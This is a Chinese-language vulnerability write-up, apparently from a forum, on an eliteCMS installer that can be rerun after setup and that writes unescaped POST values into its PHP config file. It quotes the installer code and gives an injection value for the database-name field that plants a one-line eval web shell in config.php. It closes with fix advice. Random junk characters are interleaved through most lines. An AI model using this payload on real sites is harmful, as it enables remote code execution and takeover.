eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
' j+ [: I! x4 e) l5 K0 K# C; J9 B# \+ u2 z: x8 }
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
我们来看代码:
( C0 v/ w3 R$ ~% F$ R1 z - C) w+ f! R5 J# t" [) \& ]+ r, d
...
. k/ c- F$ U G$ m1 x& v, D0 e" }elseif ($_GET['step'] == "4") {
5 @: G5 p+ V" b' [. z $file = "../admin/includes/config.php"; F9 l( l2 D7 H, x5 z7 w7 C0 y: ]. g
$write = "<?php\n";
2 Z5 X2 J {! ^+ ~9 p/ E, z3 V) r+ V $write .= "/**\n";
$ z h3 L! T8 E7 r9 [2 |" T $write .= "*\n";. Z9 a* T4 }* y; ^& z/ g6 W
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...略...
$write .= "*\n";
, T' ^6 r! D. ]1 } $write .= "*/\n";7 b5 L5 w/ \) W$ t$ u( j
$write .= "\n";
0 Y3 [+ Q4 {1 J5 W6 I4 V2 ] $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n"; v' `9 t# `, h4 q( a# o Z& d" O/ w
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";; x5 |0 H% r: q! {8 C- w
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
- T1 M3 Q+ C! ^" a: I! J- s. C $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
, g1 A7 D7 H8 F& u5 N $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";+ m6 @: ~! \) x0 x C
$write .= "if (!\$connection) {\n";* |! ?+ n: [$ Y- @# ]
$write .= " die(\"Database connection failed\" .mysql_error());\n";
$ }( S% _& @" _9 |: I. G* ^ $write .= " \n";& P3 o% h/ j. Y3 ]" ~# b
$write .= "} \n";( | Q3 e& f9 w& k* j0 ]
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
2 X1 C* `$ h3 S* u $write .= "if (!\$db_select) {\n";7 \, p2 j. Z; p d
$write .= " die(\"Database select failed\" .mysql_error());\n";
9 D2 E: |7 m8 B9 J9 Y $write .= " \n";
5 c) R+ l1 ^' s) ^" I% Z $write .= "} \n";( Y3 N/ J" {' x) t- Q6 x& |2 ~
$write .= "?>\n";
( ?% p0 w% Q/ J8 |, `
* t: G2 `" {9 B) q $writer = fopen($file, 'w');
, T2 b5 s4 r$ ^* `! p8 }$ V- F0 h/ ^...
4 w, v6 ~7 R2 @+ h9 ?- y9 G
再看取值部分的代码:
$ v; x& X5 r! G% W2 w) x1 O
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER']; y$ z0 ~. Y( K8 w, Z
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];4 ]) \' V4 @/ \- R% j
$_SESSION['DB_USER'] = $_POST['DB_USER'];+ k' W+ {2 J0 J/ T2 q) {
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
. Z4 d* z* i4 K* u, F/ A8 |
取值未作任何验证,写入 config.php 时也未做任何转义,直接拼接进了生成的 PHP 源码。
如果将数据库名(DB_NAME)的 POST 数据设为:
9 s- c' B4 J7 }( @3 {7 s+ [ & k# h; c' p$ [% t
"?><?php eval($_POST[c]);?><?php
9 w+ l( m6 C u4 u$ `
将导致一句话后门写入 /admin/includes/config.php。修复应在安装完成后锁定或删除安装程序,并在写入配置前对取值做验证与转义(例如用 var_export() 生成字符串字面量,而不是直接拼接)。
|